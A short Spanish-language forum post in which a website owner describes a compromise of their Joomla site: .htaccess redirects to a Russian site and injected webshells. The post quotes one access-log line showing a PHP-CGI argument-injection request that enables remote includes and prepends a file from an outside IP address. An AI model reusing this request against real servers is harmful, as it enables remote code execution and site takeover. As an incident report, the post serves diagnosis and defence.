Gracias por la info. Estaban utilizando este exploit en mi web para modificar los .htaccess y redirigir a una web rusa, a parte de haberme encontrado webshells inyectados en diferentes .php del joomla.
Estos registros del log son los que me han traido hasta aquí
Gracias de nuevo
Estos registros del log son los que me han traido hasta aquí
Código [Seleccionar]
151.199.14.220 - - [18/May/2012:17:52:40 +0200] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt HTTP/1.1" 200 308 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"Gracias de nuevo